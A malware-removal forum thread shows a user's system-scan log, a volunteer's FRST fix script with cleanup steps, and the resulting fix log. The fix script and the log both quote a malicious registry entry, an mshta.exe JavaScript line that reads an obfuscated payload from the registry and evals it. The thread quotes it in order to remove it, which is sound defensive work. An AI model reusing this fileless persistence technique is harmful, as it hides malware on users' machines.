FirewallRules: [UDP Query User{9283DBC8-33C0-43B5-9651-F441DC55A6DF}D:\spel\uplay library\forhonor\forhonor.exe] => (Allow) D:\spel\uplay library\forhonor\forhonor.exe
FirewallRules: [TCP Query User{105F511A-3CF6-48F6-AD6C-051E9FEF4601}D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe] => (Block) D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe
FirewallRules: [UDP Query User{41437AF0-DE88-4AFA-A0CB-DAA1B25D218B}D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe] => (Block) D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe
FirewallRules: [{90F7FC5D-4BDC-4E25-81CF-7F277BC7091B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mainlining\MainliningGame.exe
FirewallRules: [{DBC3A232-DF3B-4592-AAD9-5AD7C9E8EF26}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mainlining\MainliningGame.exe
FirewallRules: [{11C7801C-EA50-48C3-B975-C7808EBB34BA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\River City Ransom Underground\RCRU.exe
FirewallRules: [{A402D5BB-ACD3-4564-8602-D1C3AFE8A5FC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\River City Ransom Underground\RCRU.exe
FirewallRules: [TCP Query User{90E2740D-4865-43C6-91D4-B44837FB7951}D:\spel\doom\doomx64.exe] => (Block) D:\spel\doom\doomx64.exe
FirewallRules: [UDP Query User{91DD21ED-6B7D-4517-ABA8-25131C27A725}D:\spel\doom\doomx64.exe] => (Block) D:\spel\doom\doomx64.exe
FirewallRules: [{0E9497B1-EDF3-4BDA-84E8-C4AF819F2B1F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\BETA\Binaries\Win32\DepthGame.exe
FirewallRules: [{DE8F4F0F-22D5-4E28-9D99-3E79A12D25D0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\BETA\Binaries\Win32\DepthGame.exe
FirewallRules: [TCP Query User{392BB40D-09A3-46AE-B483-4A87F354BBE3}D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [UDP Query User{02BF2D2B-EBEA-47F5-B4FA-A51CBA9A9C83}D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [TCP Query User{94065ED6-5B78-4044-AE30-8E49C3C21237}D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe] => (Block) D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe
FirewallRules: [UDP Query User{27CA16C0-9AB9-4376-AE22-9AA13C815A01}D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe] => (Block) D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe
FirewallRules: [TCP Query User{FF88AE80-179E-4787-99D1-9D9601F0F888}D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{DE54AA93-CF4F-4466-966B-16CCAAB5E2AF}D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{1A5EA0B5-372C-4636-865C-96EB70C2B9F8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{0289A623-6B29-4123-AFAD-83CC04D6E3D1}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{094AA815-F657-443A-BD7D-E8BF39CB1875}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\Beta\AwesomenautsLauncher.exe
FirewallRules: [{E6B49A1F-10BF-4C9D-939D-AF1B9D814811}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\Beta\AwesomenautsLauncher.exe
FirewallRules: [TCP Query User{1B0D9DFE-155E-4872-9EA3-EB0B754A22E9}D:\spel\factorio_0.15.22\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.15.22\bin\x64\factorio.exe
FirewallRules: [UDP Query User{9BB74597-A81A-4634-BF7E-27D90AAE1515}D:\spel\factorio_0.15.22\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.15.22\bin\x64\factorio.exe
FirewallRules: [TCP Query User{A7B37CFC-0381-42BE-827A-63D6A4C34FC8}D:\spel\vikings - wolves of midgard\vikings.exe] => (Allow) D:\spel\vikings - wolves of midgard\vikings.exe
FirewallRules: [UDP Query User{639643C1-BDF4-477C-AD00-3FB55B221BC8}D:\spel\vikings - wolves of midgard\vikings.exe] => (Allow) D:\spel\vikings - wolves of midgard\vikings.exe
FirewallRules: [{2CAC80C4-1DD7-4ED9-AAC9-FA728E9C64C2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [{59E06B2C-F0B8-4FD2-8C95-E33BA71B7A52}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [TCP Query User{49813E33-F982-4C58-AABE-7AE5DDBB53B7}D:\spel\gauntlet slayer edition\binaries\gauntlet.exe] => (Block) D:\spel\gauntlet slayer edition\binaries\gauntlet.exe
FirewallRules: [UDP Query User{97BB371E-37DD-4871-A9B2-479DDB116DAB}D:\spel\gauntlet slayer edition\binaries\gauntlet.exe] => (Block) D:\spel\gauntlet slayer edition\binaries\gauntlet.exe
FirewallRules: [TCP Query User{AE8E1853-0B69-458C-A91B-357C96D672CA}D:\spel\starcraft ii\versions\base56787\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base56787\sc2_x64.exe
FirewallRules: [UDP Query User{6309873B-0312-49FF-93AF-7FC0CEE92B2B}D:\spel\starcraft ii\versions\base56787\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base56787\sc2_x64.exe
FirewallRules: [TCP Query User{2B66DABB-08DB-4347-B883-42E57A1977E7}D:\spel\divinity original sin 2\bin\eocapp.exe] => (Block) D:\spel\divinity original sin 2\bin\eocapp.exe
FirewallRules: [UDP Query User{B796F551-898A-414D-9130-087E8CDA4764}D:\spel\divinity original sin 2\bin\eocapp.exe] => (Block) D:\spel\divinity original sin 2\bin\eocapp.exe
FirewallRules: [{943F2851-ECFB-4B76-8DB5-790A4F3A2A60}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [{8C09611D-DED5-4A47-9CAD-6B5D30F07DEF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [TCP Query User{B57AE43D-9BD7-4625-9167-9682B1214B8E}D:\spel\starcraft ii\versions\base57507\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base57507\sc2_x64.exe
FirewallRules: [UDP Query User{F54F1B03-C911-4118-898E-C4C6741ED54C}D:\spel\starcraft ii\versions\base57507\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base57507\sc2_x64.exe
FirewallRules: [{A53DA5D6-B330-4B94-9BAD-CBFA322598D2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\BreachAndClear\bnc.exe
FirewallRules: [{0989A382-7FB7-49BD-8948-BB4D18E829E3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\BreachAndClear\bnc.exe
FirewallRules: [{86ECB8A3-9E4D-4BA6-8848-DF1BC1D6BD38}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot Enhanced Edition\lancealot.exe
FirewallRules: [{FB8EF655-CB2D-40B2-BC0A-EE99B096DB04}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot Enhanced Edition\lancealot.exe
FirewallRules: [{1AABF3A0-0D09-40C2-A9AA-0CB0D8D57BF0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\HardWest\HardWest.exe
FirewallRules: [{D9690832-509B-45D6-9409-03836DE16213}] => (Allow) D:\Spel\Steam Library\SteamApps\common\HardWest\HardWest.exe
FirewallRules: [TCP Query User{4D4A7CFE-E3AD-42FE-9ABC-F15ACA432415}D:\spel\satellite reign\satellitereignwindows.exe] => (Allow) D:\spel\satellite reign\satellitereignwindows.exe
FirewallRules: [UDP Query User{B43EA068-17FF-4825-80F1-B7BEA12DBA14}D:\spel\satellite reign\satellitereignwindows.exe] => (Allow) D:\spel\satellite reign\satellitereignwindows.exe
FirewallRules: [{E12C1E12-8918-47BF-9BF0-BB81766D03BA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aragami\Aragami.exe
FirewallRules: [{A2AE5D14-6FD2-41C1-9980-F2E7E63537F2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aragami\Aragami.exe
FirewallRules: [TCP Query User{EAEA4C7A-39C4-439B-A5A3-BC1B39F3E633}D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe] => (Block) D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe
FirewallRules: [UDP Query User{AE9B677E-82BF-4BD9-A500-9799B4349C4F}D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe] => (Block) D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe
FirewallRules: [{C07BD8B9-20CF-40B2-A390-051F5AF605EF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Spintires MudRunner\MudRunner.exe
FirewallRules: [{7E02B52F-A3D5-4771-94A8-9E1BC9A92AE0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Spintires MudRunner\MudRunner.exe
FirewallRules: [TCP Query User{0BC64E8E-D097-4302-8DE7-C52133F3F820}D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [UDP Query User{3F6D9C6D-0D88-42B3-A45B-22E3876F89E7}D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [{41295780-229B-4A41-8874-FA27D76D9D18}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SecretPonchos\bin\SecretPonchosD3D11.exe
FirewallRules: [{7FEB6C09-A3FC-4FE8-8C2F-A73DF3A26029}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SecretPonchos\bin\SecretPonchosD3D11.exe
FirewallRules: [{AE43EF82-F6F7-4C66-9E0E-04BA99ADC5A3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\EvolveGame\Bin64_SteamRetail\Evolve.exe
FirewallRules: [{72A961A6-6F51-4295-8377-36F54B3EDD2D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\EvolveGame\Bin64_SteamRetail\Evolve.exe
FirewallRules: [TCP Query User{51297500-255C-4308-A33D-A59A0226532F}D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe
FirewallRules: [UDP Query User{C086CD1D-6E88-4B53-8234-63A7F7094C27}D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe
FirewallRules: [{B0F4256D-3EB3-4DDB-9525-A5CC400DBC01}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{FD789251-9926-4417-AB50-A72ED2F1CCED}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{478551DD-BFAA-4D54-B66F-4825510EC57B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aven Colony\AvenColony.exe
FirewallRules: [{E87E1A1E-46C6-4F95-A1E6-4CB2F188F244}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aven Colony\AvenColony.exe
FirewallRules: [{4F8620B0-3C73-4A37-BE73-1E679DB228A9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Strikey Sisters\strikey_sisters.exe
FirewallRules: [{830B508E-2878-4305-82C9-B9B9ADF9AD8D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Strikey Sisters\strikey_sisters.exe
FirewallRules: [{ACB155F9-DBDA-4D65-B643-959BE30D4175}] => (Allow) C:\Program Files\Vivaldi\Application\vivaldi.exe
FirewallRules: [TCP Query User{597DC14B-49DB-40B6-A24A-E3D9953A457D}D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [UDP Query User{A9C2F1E3-849E-4D06-93ED-F0D6A0381D0A}D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [{6E206845-F48F-4619-A3DA-A5516D9D4C5A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\launcher\launcher.exe
FirewallRules: [{CE39CD5A-E51C-48D9-A1E7-2DA4AEF0C6CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\launcher\launcher.exe
FirewallRules: [{5D35B3A2-F05A-47E7-A169-9FB82F430BF5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Launcher\DCConfig.exe
FirewallRules: [{14725769-536B-4335-A537-4BBAD8646C91}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Launcher\DCConfig.exe
FirewallRules: [{2FFEA717-74A2-4877-89D2-B30E836B1AEE}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Anc\Binaries\Win64\Anc-Win64-Shipping.exe
FirewallRules: [{9EC8F931-3B33-4C1E-8707-F3D9F5D2C37B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Anc\Binaries\Win64\Anc-Win64-Shipping.exe
FirewallRules: [{87FC258F-5BEE-4C60-9620-2854B57C3376}] => (Allow) D:\Spel\Steam Library\SteamApps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [{6692C423-96D3-48B0-BE61-0A685AA7C369}] => (Allow) D:\Spel\Steam Library\SteamApps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [TCP Query User{746EE4C5-88A1-49CA-AE82-C024362EC325}D:\spel\unreal tournament goty\system\unrealtournament.exe] => (Allow) D:\spel\unreal tournament goty\system\unrealtournament.exe
FirewallRules: [UDP Query User{1CB765AF-56AD-4340-96E5-5AF7DDC35300}D:\spel\unreal tournament goty\system\unrealtournament.exe] => (Allow) D:\spel\unreal tournament goty\system\unrealtournament.exe
FirewallRules: [{6AA353F1-7DDF-490A-B825-0C9CF5C0597D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\workshop\Workshop.exe
FirewallRules: [{2253BB91-25A5-41A5-A8B1-51264D44C1DC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\workshop\Workshop.exe
FirewallRules: [{F128730D-D7BE-467C-A4BB-0C43215DC4C2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{92BD8855-E433-4E7C-9DA1-BC4ADC152C43}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{4DF2E569-34C8-428A-A8C6-689A8D3132A5}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{180A7648-B41B-49EC-9970-3A15A5246B34}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{CC32B82F-7235-40CF-890F-473BCA9F601D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{45300479-8F32-4A67-916B-F7D53A9DFB52}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{FB9D5CC2-2B07-4B7F-9F63-36452DB69316}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HobLauncher.exe
FirewallRules: [{5B525BF6-E027-4A85-98DB-0B69127E01F5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HobLauncher.exe
FirewallRules: [{E8FF906C-0588-47BE-96E9-0BE363415543}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HOB.exe
FirewallRules: [{986BA986-DD80-4802-9A0A-D9A8D1431284}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HOB.exe
FirewallRules: [{CE43BA91-078E-4D0B-AB12-53C5C0B5839A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

==================== Restore Points =========================

Could not list restore points
Check "winmgmt" service or repair WMI.


==================== Faulty Device Manager Devices =============

Could not list Devices. Check "winmgmt" service or repair WMI.


==================== Event log errors: =========================

Application errors:
==================
Error: (03/19/2018 04:51:42 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.

Error: (03/02/2018 11:13:40 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.

Error: (03/02/2018 11:12:18 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 11:12:13 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.

Error: (03/02/2018 10:24:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 09:26:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 09:16:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 08:35:04 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (03/19/2018 04:57:25 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/19/2018 04:57:24 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/19/2018 04:57:23 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/19/2018 04:57:22 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/19/2018 04:57:21 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/19/2018 04:57:20 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/19/2018 04:57:19 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/19/2018 04:57:18 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Malwarebytes Service service depends on the Windows Management Instrumentation service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.


==================== Memory info ===========================

Processor: Intel® Core™ i7-4770K CPU @ 3.50GHz
Percentage of memory in use: 9%
Total physical RAM: 16321.73 MB
Available physical RAM: 14735.58 MB
Total Virtual: 32641.63 MB
Available Virtual: 31027.39 MB

==================== Drives ================================

Drive c: (Structure) (Fixed) (Total:238.37 GB) (Free:90.7 GB) NTFS
Drive d: (Entertainment) (Fixed) (Total:1863.01 GB) (Free:192.43 GB) NTFS
Drive h: (MUSIK) (Removable) (Total:3.77 GB) (Free:2.5 GB) FAT32

\\?\Volume{0a950ecd-376b-11e3-98f7-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 238.5 GB) (Disk ID: 37EB0193)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=238.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 37EB0198)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (Size: 3.8 GB) (Disk ID: CAD4EBEA)
Partition 4: (Active) - (Size=3.8 GB) - (Type=0B)

==================== End of Addition.txt ============================

 

 

 

Attached Files



#4 nasdaq

nasdaq

  • Malware Response Team
  • 40,454 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:09 PM

Posted 19 March 2018 - 01:37 PM

Hi,

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
CloseProcesses:

U3 ayj9xjuk; C:\Windows\System32\Drivers\ayj9xjuk.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
C:\Windows\System32\Drivers\ayj9xjuk.sys

HKU\.DEFAULT\Software\Classes\3d878: "C:\Windows\system32\mshta.exe" "javascript:Qy2pqhd8="cGnOVdL4";bu1=new ActiveXObject("WScript.Shell");s7Wb7IoYn="JcVXE";HAb4P=bu1.RegRead("HKCU\\software\\dovquskjdo\\thbfcp");Z9MeKir="h8c665I";eval(HAb4P);d0jSmzjo4="b4pkxh7";" <==== ATTENTION
MSCONFIG\startupreg: Salus => C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe
C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe

cmd: ipconfig /flushdns
cmd: IPCONFIG /release
cmd: IPCONFIG /renew

cmd: sc qc winmgmt
cmd: sc queryex winmgmt
cmd: sc queryex rpcss
cmd: sc qc rpcss
cmd: sc queryex RpcEptMapper
cmd: sc qc RpcEptMapper
cmd: sc queryex DcomLaunch
cmd: sc qc DcomLaunch
cmd: sc queryex bfe
cmd: sc qc bfe

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

--RogueKiller--
  • Download & SAVE to your Desktop Download RogueKiller
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or above, right-click the program file and select "Run as Administrator"
  • Accept the user agreements.
  • Execute the scan and wait until it has finished.
  • If a Windows opens to explain what [PUM's] are, read about it.
  • Click the RoguKiller icon on your taksbar to return to the report.
  • Click open the Report
  • Click Export TXT button
  • Save the file as ReportRogue.txt
  • Click the Remove button to delete the items in RED
  • Click Finish and close the program.
  • Locate the ReportRogue.txt file on your Desktop and copy/paste the contents in your next.
=======

Download Farbar's Service Scanner utility
http://www.bleepingcomputer.com/download/farbar-service-scanner/dl/62/
and Save to your Desktop.
If using Windows 7 or above, Right-Click on fss.exe and select Run As Administrator.
If using XP, double-click to start.
Answer Yes to ok when prompted.
If your firewall then puts out a prompt, again, allow it to run.
Once FSS is on-screen, be sure the following items are checkmarked:
Internet Services
Windows Firewall
System Restore
Security Center/Action Center
Windows Update
Windows Defender


Click on "Scan".
It will create a log (FSS.txt) in the same directory the tool is run.
Copy & Paste contents of FSS.txt into your reply.
===

Run the Farbar program and post only the FRST.txt log.

Please let me know what problem persists with this computer.

#5 mortn

mortn
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:08:09 PM

Posted 19 March 2018 - 02:48 PM

Hello again!

I've completed the four steps you instructed me to do. I still get the "Failed to update(1)" prompt when launching FRST, but other than that, the progress appeared to run smoothly. It does seems like most processes and startups are disabled, but I'm guessing that is part of the process. Here are the four logs you asked for (fixlog, ReportRogue, FSS, and FRST):

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Martin (19-03-2018 19:52:22) Run:2
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CreateRestorePoint:
CloseProcesses:

U3 ayj9xjuk; C:\Windows\System32\Drivers\ayj9xjuk.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
C:\Windows\System32\Drivers\ayj9xjuk.sys

HKU\.DEFAULT\Software\Classes\3d878: "C:\Windows\system32\mshta.exe" "javascript:Qy2pqhd8="cGnOVdL4";bu1=new ActiveXObject("WScript.Shell");s7Wb7IoYn="JcVXE";HAb4P=bu1.RegRead("HKCU\\software\\dovquskjdo\\thbfcp");Z9MeKir="h8c665I";eval(HAb4P);d0jSmzjo4="b4pkxh7";" <==== ATTENTION
MSCONFIG\startupreg: Salus => C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe
C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe

cmd: ipconfig /flushdns
cmd: IPCONFIG /release
cmd: IPCONFIG /renew

cmd: sc qc winmgmt
cmd: sc queryex winmgmt
cmd: sc queryex rpcss
cmd: sc qc rpcss
cmd: sc queryex RpcEptMapper
cmd: sc qc RpcEptMapper
cmd: sc queryex DcomLaunch
cmd: sc qc DcomLaunch
cmd: sc queryex bfe
cmd: sc qc bfe

End
*****************

Error: (0) Failed to create a restore point.
Processes closed successfully.
ayj9xjuk => service not found.
"C:\Windows\System32\Drivers\ayj9xjuk.sys" => not found
"HKU\.DEFAULT\Software\Classes\3d878" => removed successfully
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Salus" => removed successfully
"C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe" => not found

========= ipconfig /flushdns =========


Windows IP Configuration

Could not flush the DNS Resolver Cache: Function failed during execution.


========= End of CMD: =========


========= IPCONFIG /release =========


Windows IP Configuration

No operation can be performed on Tunngle while it has its media disconnected.
An error occurred while releasing interface Local Area Connection : The RPC server is unavailable.


========= End of CMD: =========


========= IPCONFIG /renew =========


Windows IP Configuration

No operation can be performed on Tunngle while it has its media disconnected.
An error occurred while renewing interface Local Area Connection : The RPC server is unavailable.
 

========= End of CMD: =========


========= sc qc winmgmt =========

[SC] QueryServiceConfig SUCCESS

